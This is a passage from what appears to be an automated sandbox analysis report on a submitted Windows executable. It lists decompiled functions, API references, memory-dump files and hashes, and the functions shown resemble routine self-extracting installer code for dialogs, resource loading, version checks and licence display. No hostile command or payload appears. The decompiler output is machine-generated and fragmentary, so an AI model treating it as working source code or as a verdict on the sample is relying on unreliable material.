					 *_t65 = _t17;
				}
				return E008A6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x008a2aac
0x008a2ab7
0x008a2abc
0x008a2abe
0x008a2ac3
0x008a2ac6
0x008a2ac9
0x008a2ace
0x008a2ae6
0x008a2bdc
0x008a2bdc
0x008a2be0
0x00000000
0x00000000
0x008a2af2
0x008a2afc
0x008a2b00
0x008a2b05
0x008a2b05
0x008a2b0b
0x008a2bca
0x008a2bd1
0x008a2b11
0x008a2b18
0x008a2b26
0x008a2b99
0x008a2bc8
0x00000000
0x00000000
0x008a2b9b
0x008a2bae
0x008a2bb3
0x008a2bb5
0x008a2bb5
0x008a2bb8
0x008a2bb8
0x008a2bba
0x008a2bbb
0x00000000
0x008a2bb8
0x008a2b28
0x008a2b2e
0x008a2b33
0x008a2b39
0x008a2b3c
0x008a2b3c
0x008a2b3e
0x008a2b3f
0x008a2b55
0x008a2b5d
0x008a2b64
0x008a2b64
0x008a2b7a
0x008a2b7f
0x008a2b81
0x008a2b81
0x008a2b84
0x008a2b84
0x008a2b86
0x008a2b87
0x008a2bbf
0x008a2bc1
0x008a2bc1
0x008a2b26
0x008a2bda
0x008a2bda
0x008a2be6
0x008a2be6
0x008a2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 008A2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 008A2AF2
CharNextA.USER32(?), ref: 008A2B12
CharUpperA.USER32 ref: 008A2B1E
CharPrevA.USER32(?,?), ref: 008A2B55
CharNextA.USER32(?), ref: 008A2BD4

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 41b3efec3e73d11b187ee572532d7c6a3951659e6d08cd72288d9f98e3b3834e
Instruction ID: 66c80a40ba6b59b05a32baa4bee1fbb705c82178a0bcd29cf09293786da3fa1c
Opcode Fuzzy Hash: 41b3efec3e73d11b187ee572532d7c6a3951659e6d08cd72288d9f98e3b3834e
Instruction Fuzzy Hash: EE41D234504145AFFB299F288854AFD7BA9FF57320F14009AD8C2D3A02EB354E47CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008A43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E008A43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E008A6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x008a43d0
0x008a43d8
0x008a43df
0x008a43e6
0x008a43ec
0x008a43f1
0x008a4400
0x008a4403
0x008a440b
0x008a4420
0x008a4429
0x008a4437
0x008a4444
0x008a4447
0x008a444d
0x008a4454
0x008a445b
0x008a4460
0x008a4461
0x008a4467
0x008a446f
0x008a4473
0x008a4473
0x008a4463
0x008a4463
0x008a4463
0x008a447a
0x008a4481
0x008a4484
0x008a448a
0x008a4492
0x008a4496
0x008a4496
0x008a4486
0x008a4486
0x008a4486
0x008a44b8

APIs

GetWindowRect.USER32(?,?), ref: 008A43F1
GetWindowRect.USER32(00000000,?), ref: 008A440B
GetDC.USER32(?), ref: 008A4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 008A442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 008A443A
ReleaseDC.USER32(?,00000000), ref: 008A4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 008A44A2

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: e6ea51a6933aaedfcdc10ff48c74446853fd16c7fc69ba8325515080a3f2be3d
Instruction ID: 64b8cefd8747108ba2ad61703d75337ccb9da2f75bd375aa1809f86b7645907f
Opcode Fuzzy Hash: e6ea51a6933aaedfcdc10ff48c74446853fd16c7fc69ba8325515080a3f2be3d
Instruction Fuzzy Hash: 49313B32E01519ABDF14CFB8DD889AEBBB5FB8A310F155169E905F3640DA706C05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 008A6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E008A6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E008A171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x8a9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x8aa288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E008A171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E008A6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x008a6298
0x008a62a0
0x008a62a7
0x008a62ad
0x008a62af
0x008a62bb
0x008a62c3
0x008a62c4
0x008a633b
0x008a633b
0x008a6345
0x008a634d
0x00000000
0x00000000
0x008a62da
0x008a62de
0x008a635f
0x008a6369
0x008a62e0
0x008a62e0
0x008a62e0
0x008a62e3
0x008a62e5
0x008a62e5
0x008a62e8
0x008a62e8
0x008a62ea
0x008a62eb
0x008a62ef
0x008a62f1
0x008a62f3
0x008a6302
0x008a6308
0x008a630d
0x008a6314
0x008a6314
0x008a6316
0x008a6319
0x008a6355
0x008a6357
0x008a631b
0x008a631b
0x008a6331
0x008a6334
0x008a6339
0x00000000
0x008a6339
0x008a6319
0x008a636b
0x008a637d
0x008a637d
0x00000000

APIs

Part of subcall function 008A171E: _vsnprintf.MSVCRT ref: 008A1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,008A51CA,00000004,00000024,008A2F71,?,00000002,00000000), ref: 008A62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,008A51CA,00000004,00000024,008A2F71,?,00000002,00000000), ref: 008A62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008A51CA,00000004,00000024,008A2F71,?,00000002,00000000), ref: 008A631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 008A6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008A51CA,00000004,00000024,008A2F71,?,00000002,00000000), ref: 008A6357

Strings

UPDFILE%lu, xrefs: 008A62B3, 008A6329

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 38b0876e66cd97836e34a7bea71d5107a0371c3f582731d13164bb67958fad72
Instruction ID: 456ba3fbddd8b933cb089ef4d0f8dc741d01f8011d11a0069025f7d2163a9434
Opcode Fuzzy Hash: 38b0876e66cd97836e34a7bea71d5107a0371c3f582731d13164bb67958fad72
Instruction Fuzzy Hash: 6221E675A00219ABEF149F64CC499BFBB78FB46714B040129E902E3A41EB799D16CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 008A681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E008A681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t19 ^ _t44;
				_t41 =  *0x8a81d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x8a81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x8a81d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x8a1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E008A66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x8a81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E008A6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x008a681f
0x008a682a
0x008a6831
0x008a6836
0x008a683c
0x008a683e
0x008a6848
0x008a6851
0x008a685d
0x008a6864
0x008a6876
0x008a693a
0x008a693a
0x008a687c
0x008a687e
0x008a6885
0x00000000
0x008a68d6
0x008a68f4
0x008a6900
0x008a6902
0x008a690a
0x00000000
0x008a690c
0x008a690c
0x008a691c
0x00000000
0x008a691e
0x008a6924
0x008a692b
0x008a6932
0x00000000
0x00000000
0x00000000
0x008a692b
0x008a691c
0x008a690a
0x008a6885
0x008a6876
0x008a6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008A686E
GetSystemMetrics.USER32(0000004A), ref: 008A68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008A68CC
RegQueryValueExA.ADVAPI32(?,008A1140,00000000,?,?,0000000C), ref: 008A68F4
RegCloseKey.ADVAPI32(?), ref: 008A6902

Part of subcall function 008A66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,008A691A), ref: 008A6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 008A68C2

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 741570a1f6246a3a8f9da9587e75d38c16ab507792444d63554a6c3898d1bc70
Instruction ID: 62f036fb50fe23ed395dd26fe98d550c3b2064d9605f02ed8f4a51f7428c25fd
Opcode Fuzzy Hash: 741570a1f6246a3a8f9da9587e75d38c16ab507792444d63554a6c3898d1bc70
Instruction Fuzzy Hash: D5315231A00219DFFB218B21CC45BAB7B78FB47764F080199E949E2944EB309D95CF52

Uniqueness

Uniqueness Score: -1.00%

Function 008A3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E008A468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x8a8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E008A468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x8a8d4c, "<None>") == 0) {
							LocalFree( *0x8a8d4c);
							L9:
							 *0x8a9124 = 0;
							return 1;
						}
						_t9 = E008A6517(_t19, 0x7d1, 0, E008A3100, 0, 0);
						LocalFree( *0x8a8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x8a9124 = 0x800704c7;
						L2:
						return 0;
					}
					E008A44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x8a8d4c);
					 *0x8a9124 = 0x80070714;
					goto L2;
				}
				E008A44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x8a9124 = E008A6285();
				goto L2;
			}

0x008a3a46
0x008a3a57
0x008a3a5d
0x008a3a63
0x008a3a6a
0x008a3a91
0x008a3a9a
0x008a3ad8
0x008a3b13
0x008a3b19
0x008a3b1b
0x00000000
0x008a3b21
0x008a3ae7
0x008a3af4
0x008a3afc
0x00000000
0x00000000
0x008a3afe
0x008a3a87
0x00000000
0x008a3a87
0x008a3aa8
0x008a3ab3
0x008a3ab9
0x00000000
0x008a3ab9
0x008a3a78
0x008a3a82
0x00000000

APIs

Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
Part of subcall function 008A468F: SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
Part of subcall function 008A468F: LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
Part of subcall function 008A468F: LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
Part of subcall function 008A468F: memcpy_s.MSVCRT ref: 008A46E5
Part of subcall function 008A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008A2F64,?,00000002,00000000), ref: 008A3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 008A3AB3

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Part of subcall function 008A6285: GetLastError.KERNEL32(008A5BBC), ref: 008A6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 008A3AD0
LocalFree.KERNEL32 ref: 008A3B13

Part of subcall function 008A6517: FindResourceA.KERNEL32(008A0000,000007D6,00000005), ref: 008A652A
Part of subcall function 008A6517: LoadResource.KERNEL32(008A0000,00000000,?,?,008A2EE8,00000000,008A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008A6538
Part of subcall function 008A6517: DialogBoxIndirectParamA.USER32(008A0000,00000000,00000547,008A19E0,00000000), ref: 008A6557
Part of subcall function 008A6517: FreeResource.KERNEL32(00000000,?,?,008A2EE8,00000000,008A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008A6560

LocalFree.KERNEL32(00000000,008A3100,00000000,00000000), ref: 008A3AF4

Strings

<None>, xrefs: 008A3AC5
LICENSE, xrefs: 008A3A46

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 88fa191156f7e640ddcfada87e2abc4fbf9fac03d35e9b6fbc5c3fc1dbed4340
Instruction ID: 3a59efd730dfc118fb7c7d18d85fc4e0df2cb971c7ee9d8c27faa2ea59fed02d
Opcode Fuzzy Hash: 88fa191156f7e640ddcfada87e2abc4fbf9fac03d35e9b6fbc5c3fc1dbed4340
Instruction Fuzzy Hash: BA11B730301611ABF764AF76AC09E1739A9FBDB710B10403EB541D6DA0EA798801C625

Uniqueness

Uniqueness Score: -1.00%

Function 008A24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E008A24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E008A658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E008A6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x008a24e0
0x008a24eb
0x008a24f2
0x008a24f7
0x008a2504
0x008a250e
0x008a251d
0x008a252c
0x008a2541
0x008a2546
0x008a2553
0x008a2555
0x008a2555
0x008a2546
0x008a256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 008A2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 008A252C
_lopen.KERNEL32 ref: 008A253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 008A254C
_lclose.KERNEL32(00000000), ref: 008A2555

Strings

wininit.ini, xrefs: 008A2510

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 37bec6e5d75f6a2f86bad7ea4ace45de9e2acef1ef1bd856c95a1d3ab23c1c19
Instruction ID: 1e9e32996926c364d0bfefeedb0f0b74fe80ee1135e62d2eebad27a657a66c25
Opcode Fuzzy Hash: 37bec6e5d75f6a2f86bad7ea4ace45de9e2acef1ef1bd856c95a1d3ab23c1c19
Instruction Fuzzy Hash: 72019232A00518A7E720DB69DC0CEDB7B7DFB47760F000155FA59D3990DB748E45CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 008A36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E008A36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x8a8184 = 1;
						 *0x8a8180 = 1;
						L13:
						 *0x8a9a40 = _t119;
						L14:
						__eflags =  *0x8a8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E008A2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E008A2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x8a8a38 & 0x00000001;
											if(( *0x8a8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("siga30");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E008A681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "siga30", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E008A67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E008A28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
